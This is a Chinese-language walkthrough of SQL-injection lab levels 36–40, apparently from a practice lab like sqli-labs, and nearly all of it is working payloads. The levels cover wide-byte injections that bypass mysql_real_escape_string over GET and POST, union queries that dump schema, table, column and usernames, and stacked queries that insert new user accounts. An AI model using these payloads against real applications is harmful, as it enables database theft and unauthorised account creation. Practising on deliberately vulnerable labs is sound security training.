第三十六关:mysql_real_escape_string宽字符+GET单引号
跟第三十三关基本一致。
?id=-1%E6' union select 1,2,database() --+
?id=2&id=-1%E6' union select 1,2,database() --+
?id=2&id=-1%E6' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
?id=2&id=-1%E6' union select 1,2, group_concat(column_name) from information_schema.columns WHERE table_name=0x7573657273--+
#把users替换为十六进制0x7573657273
?id=2&id=-1%E6' union select 1,2, group_concat(username) from users--+ 第三十七关:mysql_real_escape_string宽字符+POST单引号
跟第三十四关基本一致。
# 平级越权
uname=%E6' or 1 limit 1,1#&passwd=1&submit=Submit
uname=%E6'union select 1,database()--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(schema_name) from information_schema.schemata--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(column_name) from information_schema.columns WHERE table_name=0x7573657273--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(username) from users--+&passwd=1&submit=Submit 第三十八关:堆叠注入+GET单引号
?id=0' union select 1,user(),database(); insert into users(username,password) values('stack', 'stack')--+ 这样就可以查看到插入的
stack
用户名:
第三十九关:堆叠注入+GET数值
?id=0 union select 1,user(),database(); insert into users(username,password) values('stack1', 'stack1')--+ 
第四十关:堆叠注入+GET数值
待续